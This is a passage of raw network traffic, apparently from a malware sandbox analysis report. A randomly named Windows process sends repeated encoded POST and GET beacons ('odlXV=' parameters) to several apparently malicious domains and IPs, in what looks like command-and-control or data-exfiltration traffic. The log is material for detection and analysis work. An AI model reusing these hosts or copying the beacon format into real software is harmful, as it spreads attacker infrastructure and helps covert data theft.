Jul 27, 2024 11:40:41.367245913 CEST	658	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 09:40:41 GMT Server: Apache Content-Length: 514 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49720	203.161.43.228	80	5904	C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:40:43.276724100 CEST	1765	OUT	POST /02nb/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1230 Host: www.firmshow.top Origin: http://www.firmshow.top Referer: http://www.firmshow.top/02nb/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 Data Raw: 6f 64 6c 58 56 3d 39 43 6b 55 33 6b 66 74 69 34 48 32 70 41 65 38 63 48 4a 4e 2f 6a 46 38 4a 70 53 35 62 55 2b 50 56 39 42 6f 33 76 4a 71 51 74 4e 61 44 70 70 72 61 6e 68 65 6b 75 64 4e 78 31 6a 7a 42 47 33 32 74 44 4d 74 61 64 74 59 57 34 34 30 54 54 2b 33 47 75 6e 38 4b 75 77 6c 57 73 4f 69 31 66 4d 62 50 69 55 7a 53 65 37 5a 55 67 51 58 32 5a 72 41 75 56 66 32 4e 56 38 79 4d 5a 53 55 61 32 70 76 31 38 35 61 4e 77 52 61 44 79 7a 77 46 35 66 38 6e 55 37 48 78 53 6e 36 52 42 46 6f 48 6b 4d 4c 73 49 4f 33 6d 57 42 43 78 6f 68 58 75 45 32 39 59 54 57 6b 51 70 41 53 47 6f 6a 63 4e 41 7a 59 2f 48 66 6d 41 30 53 4f 67 4f 45 4e 70 43 6e 76 49 6f 55 73 73 68 4f 68 79 42 32 47 53 6d 4b 54 55 77 6f 76 4e 7a 63 77 38 4b 55 48 6f 63 6b 2f 4a 4d 66 4d 58 33 65 62 6c 30 69 4f 71 44 35 75 4b 45 67 6d 77 32 75 52 72 4b 59 53 32 52 66 48 50 34 55 36 6a 69 51 59 77 57 31 77 43 65 79 4f 6c 5a 78 70 47 2b 68 30 46 79 4c 35 31 4a 75 38 63 75 4f 63 53 4e 50 32 62 49 54 2b 45 37 73 43 56 59 67 62 31 49 78 78 42 69 55 51 [TRUNCATED] Data Ascii: odlXV=9CkU3kfti4H2pAe8cHJN/jF8JpS5bU+PV9Bo3vJqQtNaDppranhekudNx1jzBG32tDMtadtYW440TT+3Gun8KuwlWsOi1fMbPiUzSe7ZUgQX2ZrAuVf2NV8yMZSUa2pv185aNwRaDyzwF5f8nU7HxSn6RBFoHkMLsIO3mWBCxohXuE29YTWkQpASGojcNAzY/HfmA0SOgOENpCnvIoUsshOhyB2GSmKTUwovNzcw8KUHock/JMfMX3ebl0iOqD5uKEgmw2uRrKYS2RfHP4U6jiQYwW1wCeyOlZxpG+h0FyL51Ju8cuOcSNP2bIT+E7sCVYgb1IxxBiUQZFXWRyY6DbHgP/jvkbWcC7lx4i2PtIpyzx9FkbPEFiUbuL6w2cY9Zh94QFJgFA9DK64I15LFL31b5gzNGa0UyDfp+7o++9e3uzgK7hIO2+n8iltiZK3sipWnUJS04lKLQlVtGutGJ8JQFQAGDokAsEiy5xjjKxmNNJB/Iltw2oKZcdMpi/uNX6/dOE5F37R8uuAD99ktDuVs2OPz1/GhFjh6x3v6BaJxJzJE1mJz+d/ubFaIhruYDz6cM7b/toyOmrYH5q4McIN3aNrr87rmHW15nHNsZ9KFqyG/0auGgTFZ4NS5Ao4sBcL931TvnAC74Q1JMmaNaaWNYkhWIbvfqeFxnZdnxEO9FgOZJXpbSqDtwP9HbE6C4VyE9TX0kEpvfo+XySrY4h7F49Eyaattp9YpsV6rgBoUA8vybdaZDH4wurohREJuyqtL4HOvSm6PSRktl0zFWxYqL1BUUOnkKMzqPi6UKjpzxzNNiXqns1gRCwf5RJrtOuNeWr2OMWR9Xy2fJyQpeRVzoCPO2tWw9tH31vZWfeuooPNU99ueEYcsj0KHsJJJM5VjFNLflsrZ7Qf2Q1JLeRuNt5IuuW0kYVInvkl+l1aLQD5dNJbmATEquCstW0cc8/FRuu6c4F0MU4mdl0B1e8KFpTLVUwtjWTZkJQUTgLnPTy [TRUNCATED]
Jul 27, 2024 11:40:43.923430920 CEST	658	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 09:40:43 GMT Server: Apache Content-Length: 514 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49721	203.161.43.228	80	5904	C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:40:45.810230970 CEST	462	OUT	GET /02nb/?odlXV=wAM00RPxm4SI4CXmbVVIy3I1PpnrRkiLCY5B6OI1JPNyCoxACldRit5a2XiaNEn9mU81Z8Y/J9c7Sme1Jv71fP4xTcu1wI0JIyM1RMLSZxEp7JGf5Q==&3rb=9LUll6 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.firmshow.top User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Jul 27, 2024 11:40:46.413665056 CEST	673	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 09:40:46 GMT Server: Apache Content-Length: 514 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49722	38.47.158.215	80	5904	C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:40:52.231821060 CEST	719	OUT	POST /g67v/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 194 Host: www.jl800.vip Origin: http://www.jl800.vip Referer: http://www.jl800.vip/g67v/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 Data Raw: 6f 64 6c 58 56 3d 52 2b 6b 62 74 47 42 48 71 63 4a 72 2b 54 77 71 6b 67 76 77 4a 30 53 74 6f 55 4d 7a 2f 33 47 59 74 2f 4e 59 56 66 57 35 45 6a 37 65 52 44 63 39 46 4c 2f 6f 4a 71 56 65 49 41 6e 65 30 6c 76 32 43 6b 38 44 6e 45 74 2f 50 69 37 57 6d 79 36 67 69 2f 50 4d 61 49 51 37 6a 41 67 76 2f 31 34 5a 39 4f 64 54 77 50 63 41 6b 55 69 47 65 38 44 37 2f 36 5a 42 43 56 78 57 77 44 67 35 73 36 6a 5a 4a 53 4d 78 33 46 52 42 78 4e 4f 4d 63 4d 74 54 55 74 7a 6e 55 55 4e 69 49 33 49 5a 6d 76 34 50 74 67 56 67 77 79 71 61 66 77 62 72 5a 4a 32 2f 32 67 6f 58 4f 77 68 4b 6b 4c 53 67 Data Ascii: odlXV=R+kbtGBHqcJr+TwqkgvwJ0StoUMz/3GYt/NYVfW5Ej7eRDc9FL/oJqVeIAne0lv2Ck8DnEt/Pi7Wmy6gi/PMaIQ7jAgv/14Z9OdTwPcAkUiGe8D7/6ZBCVxWwDg5s6jZJSMx3FRBxNOMcMtTUtznUUNiI3IZmv4PtgVgwyqafwbrZJ2/2goXOwhKkLSg
Jul 27, 2024 11:40:53.249737978 CEST	790	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:40:52 GMT Content-Type: application/json;charset=utf8; Content-Length: 62 Connection: close Set-Cookie: http_waf_cookie=8fb848f8-b792-4c7ca3128d77b410bef70ede87be3fb5b3a5; Expires=1722080452; Path=/; HttpOnly Set-Cookie: acw_tc=ac11000117220732528751073e008940a52dc1e868784b9d8c762efea9798e;path=/;HttpOnly;Max-Age=1800 jckl: WoQY1gQwwj3BinHlulNBrTqIbNefLXMNboANwBcks9BI9MP4VT5fzruLA8umWLi7LDwwbClYigRv7nD5/sdKPA== x-content-type-options: nosniff x-xss-protection: 1 strict-transport-security: max-age=63072000; includeSubdomains; preload Via: 1.1 google, 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 X-Request-Id: 01bce6487fda41cf9a1f911152d1790b Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d Data Ascii: {"status": "6001","msg": "fail","result":""}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49723	38.47.158.215	80	5904	C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:40:54.759890079 CEST	743	OUT	POST /g67v/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 218 Host: www.jl800.vip Origin: http://www.jl800.vip Referer: http://www.jl800.vip/g67v/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 Data Raw: 6f 64 6c 58 56 3d 52 2b 6b 62 74 47 42 48 71 63 4a 72 2f 33 4d 71 68 42 76 77 49 55 53 75 6a 30 4d 7a 31 58 47 45 74 2f 42 59 56 62 6d 70 45 56 4c 65 52 69 4d 39 45 50 72 6f 4f 71 56 65 61 67 6e 66 35 46 76 39 43 6b 77 4c 6e 47 70 2f 50 6b 58 57 6d 33 47 67 69 4d 33 4e 56 34 51 35 36 51 67 74 79 56 34 5a 39 4f 64 54 77 50 49 6d 6b 55 36 47 66 4e 54 37 2b 59 78 43 42 56 78 56 33 44 67 35 37 4b 6a 56 4a 53 4e 65 33 46 68 37 78 4f 6d 4d 63 49 70 54 54 38 7a 6b 50 6b 4e 37 58 6e 49 4b 6d 71 46 2b 68 53 45 61 2f 52 48 54 50 52 62 64 54 49 58 34 6e 78 4a 41 64 48 39 45 71 4e 6e 4b 57 68 39 43 41 61 41 6c 42 59 32 46 49 6e 62 46 4d 50 58 47 77 77 3d 3d Data Ascii: odlXV=R+kbtGBHqcJr/3MqhBvwIUSuj0Mz1XGEt/BYVbmpEVLeRiM9EProOqVeagnf5Fv9CkwLnGp/PkXWm3GgiM3NV4Q56QgtyV4Z9OdTwPImkU6GfNT7+YxCBVxV3Dg57KjVJSNe3Fh7xOmMcIpTT8zkPkN7XnIKmqF+hSEa/RHTPRbdTIX4nxJAdH9EqNnKWh9CAaAlBY2FInbFMPXGww==
Jul 27, 2024 11:40:55.568243980 CEST	790	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:40:55 GMT Content-Type: application/json;charset=utf8; Content-Length: 62 Connection: close Set-Cookie: http_waf_cookie=b786f9de-928a-4383cbe1ebd86249f2fdd665e71bf478d58d; Expires=1722080455; Path=/; HttpOnly Set-Cookie: acw_tc=ac11000117220732554134602e008229dba08eabf72e85e9465e58fe167a1d;path=/;HttpOnly;Max-Age=1800 jckl: EXm1cv/M8qk9XnJXWWF+SC9VvDv5cXFDG3EWH0vd1tXxP/A9+VpFVz4vFwfqRDeT4L9cGeJKzB/8Ruf9Ngk7Cw== x-content-type-options: nosniff x-xss-protection: 1 strict-transport-security: max-age=63072000; includeSubdomains; preload Via: 1.1 google, 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 X-Request-Id: 9749083f89758b969e4e8593679fe1e9 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d Data Ascii: {"status": "6001","msg": "fail","result":""}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49724	38.47.158.215	80	5904	C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:40:57.292507887 CEST	1756	OUT	POST /g67v/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1230 Host: www.jl800.vip Origin: http://www.jl800.vip Referer: http://www.jl800.vip/g67v/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 Data Raw: 6f 64 6c 58 56 3d 52 2b 6b 62 74 47 42 48 71 63 4a 72 2f 33 4d 71 68 42 76 77 49 55 53 75 6a 30 4d 7a 31 58 47 45 74 2f 42 59 56 62 6d 70 45 57 72 65 52 56 4d 39 46 75 72 6f 50 71 56 65 5a 67 6e 61 35 46 76 67 43 6b 59 31 6e 47 31 4a 50 68 4c 57 6e 52 53 67 6b 39 33 4e 43 6f 51 35 79 77 67 6f 2f 31 34 32 39 4f 4e 70 77 50 59 6d 6b 55 36 47 66 4f 37 37 2b 4b 5a 43 48 56 78 57 77 44 67 39 73 36 6a 35 4a 53 6b 70 33 45 56 72 78 2b 47 4d 64 73 4e 54 56 4f 4c 6b 44 6b 4e 75 55 6e 4a 58 6d 71 42 6c 68 53 70 6a 2f 51 79 32 50 58 72 64 66 75 65 45 34 41 78 38 47 78 74 36 32 73 4c 74 55 6e 5a 5a 46 65 31 6e 41 61 79 79 63 6a 4b 35 4b 38 57 73 74 73 4e 37 4a 58 4e 57 73 76 6a 6c 64 7a 6d 7a 42 36 4b 47 4a 6f 51 68 4f 69 70 65 45 66 70 75 57 6d 76 78 50 67 36 2f 35 57 2f 32 4b 53 49 65 6c 56 6c 77 6a 50 74 53 78 54 37 74 62 44 4a 6f 31 71 42 56 6b 44 6b 58 75 36 34 35 6a 4e 62 41 4b 4b 61 75 54 47 2b 77 43 72 63 6a 39 64 63 47 71 76 33 4e 4c 30 58 6f 64 7a 63 4e 44 62 6d 7a 69 48 39 6f 6e 68 72 2b 54 64 2b 51 [TRUNCATED] Data Ascii: odlXV=R+kbtGBHqcJr/3MqhBvwIUSuj0Mz1XGEt/BYVbmpEWreRVM9FuroPqVeZgna5FvgCkY1nG1JPhLWnRSgk93NCoQ5ywgo/1429ONpwPYmkU6GfO77+KZCHVxWwDg9s6j5JSkp3EVrx+GMdsNTVOLkDkNuUnJXmqBlhSpj/Qy2PXrdfueE4Ax8Gxt62sLtUnZZFe1nAayycjK5K8WstsN7JXNWsvjldzmzB6KGJoQhOipeEfpuWmvxPg6/5W/2KSIelVlwjPtSxT7tbDJo1qBVkDkXu645jNbAKKauTG+wCrcj9dcGqv3NL0XodzcNDbmziH9onhr+Td+Q7ovUU8uPVzlt8cttdSN0q1kJFQ9Zvt6gXdUdc0e2WvZ0JV2uoaHcP3U22P9XNSbUmnnoCy1cTOB3Kv+fBCvJ5r27rAMNoQbfmNixw/KHUbYRzMsEvMYt8JzoWpv57HysBwbCDhUUrraYt33TZUkO1T9pkepKSqk1NcqG4u4/TWgGTG3Jet6NUpe1pOd1iM7ZvZgGWNqatCrYDbqGR/6PuxEYJdAgS3CH1z45/iBYnTy+E3VGBTTItTgCwBT/M/XcIuy30I8qLy0+j4hunP7pTmO/HMUe3AbrudYA2X3kn1vRqpyrBBZqgZbZRH7MJ25UN72hU3mHI0VOv+rpPDcZBmhpoFjeG71WNFghi9v8NHVU3HdBlrKu922nFa2eF9hGrKpHHVLtkZoEgvGZE/KU3jbhEHs4/ed66Jdccu/WE1xYGhUrArYWuL2eBAO7Gwe401ZcY4l+FsrRqEy2lVBrjna4E8/jHpurIcsXHWhxGBaJxDu0hLeUIMYGeRI9y5mY6e3mP6misRTFhsCZNRepc7SIUrkcB2KqjroFO6pPs6AZdFBe3XIxXNTUI0IKnzJ956HqPs7hu1eIg1TXUhLCDOuf+PgQ+vJAeB6v/sjVlD6zKT/K9HaeKpmJbSVf9RYU5ta7hyzeQE7bpUhOUUCvljT+MyAe0CEFQY [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49725	38.47.158.215	80	5904	C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:40:59.828289986 CEST	459	OUT	GET /g67v/?odlXV=c8M7uxZhudpInUsrkR2DFEXxpEFo+k2F1tpwZ/KeEHHRQR8ISdL3H7dZekm83GXANV8iiloQGx74ti2jjfGNBbovzA8U6SAL2sR/6tcpi17CTcO2sg==&3rb=9LUll6 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.jl800.vip User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Jul 27, 2024 11:41:00.653422117 CEST	790	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:41:00 GMT Content-Type: application/json;charset=utf8; Content-Length: 62 Connection: close Set-Cookie: http_waf_cookie=8c1979db-98fa-4dcf91c261b568a7f57ad834b81e698e2711; Expires=1722080460; Path=/; HttpOnly Set-Cookie: acw_tc=ac11000117220732605017619e008a22956d53533e59343bf75aa313eeb8b5;path=/;HttpOnly;Max-Age=1800 jckl: jyGz1WbN/KHmqwdHOdDtzYekGxgrO5OdnzRLPZBABMsccEkKYIk8wf+uJqDZJ2ff0C2LoU7C/N2iQ6iZLCYbvQ== x-content-type-options: nosniff x-xss-protection: 1 strict-transport-security: max-age=63072000; includeSubdomains; preload Via: 1.1 google, 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 X-Request-Id: 7015b331e19fe72c11d3336f60c5b68c Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d Data Ascii: {"status": "6001","msg": "fail","result":""}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49726	3.33.130.190	80	5904	C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:41:05.697407007 CEST	746	OUT	POST /frbh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 194 Host: www.theridleysuk.co.uk Origin: http://www.theridleysuk.co.uk Referer: http://www.theridleysuk.co.uk/frbh/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 Data Raw: 6f 64 6c 58 56 3d 4e 5a 53 50 71 31 61 54 2b 42 62 57 49 38 4a 6a 62 62 4e 44 70 49 4e 55 53 56 46 55 6e 6a 2f 4b 32 2f 4a 6a 52 67 4c 30 62 78 7a 4e 68 41 4b 74 4b 6c 61 59 58 2b 68 75 6d 6d 31 48 42 47 31 75 70 78 71 48 68 71 4b 68 70 56 44 35 49 6e 49 62 6c 79 62 4c 73 43 6e 70 6b 4b 50 64 5a 77 6d 42 46 47 42 44 66 56 54 50 31 39 4a 6b 72 2b 2f 53 4e 76 63 4f 33 53 79 6a 51 6b 6f 4d 4d 56 56 38 43 47 47 46 48 48 76 5a 37 42 45 38 65 5a 44 32 41 34 59 49 78 4d 53 4b 5a 68 4c 42 6e 63 32 66 33 70 64 34 55 46 48 32 54 74 4a 66 64 39 2f 38 73 4d 6b 56 49 4f 4e 62 41 6e 65 70 Data Ascii: odlXV=NZSPq1aT+BbWI8JjbbNDpINUSVFUnj/K2/JjRgL0bxzNhAKtKlaYX+humm1HBG1upxqHhqKhpVD5InIblybLsCnpkKPdZwmBFGBDfVTP19Jkr+/SNvcO3SyjQkoMMVV8CGGFHHvZ7BE8eZD2A4YIxMSKZhLBnc2f3pd4UFH2TtJfd9/8sMkVIONbAnep

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.10	49727	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:41:09.028253078 CEST	770	OUT	POST /frbh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 218 Host: www.theridleysuk.co.uk Origin: http://www.theridleysuk.co.uk Referer: http://www.theridleysuk.co.uk/frbh/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 Data Raw: 6f 64 6c 58 56 3d 4e 5a 53 50 71 31 61 54 2b 42 62 57 49 63 5a 6a 49 4d 5a 44 76 6f 4e 58 4d 46 46 55 70 7a 2f 30 32 2f 46 6a 52 68 2f 6b 62 6a 6e 4e 67 67 36 74 4c 6b 61 59 55 2b 68 75 74 47 31 65 4f 6d 31 66 70 78 6d 50 68 72 6d 68 70 56 48 35 49 6e 59 62 77 52 7a 55 73 53 6e 76 74 71 50 62 45 41 6d 42 46 47 42 44 66 56 58 68 31 39 42 6b 72 74 6e 53 66 36 77 50 72 43 79 6b 47 55 6f 4d 64 46 56 67 43 47 47 37 48 47 79 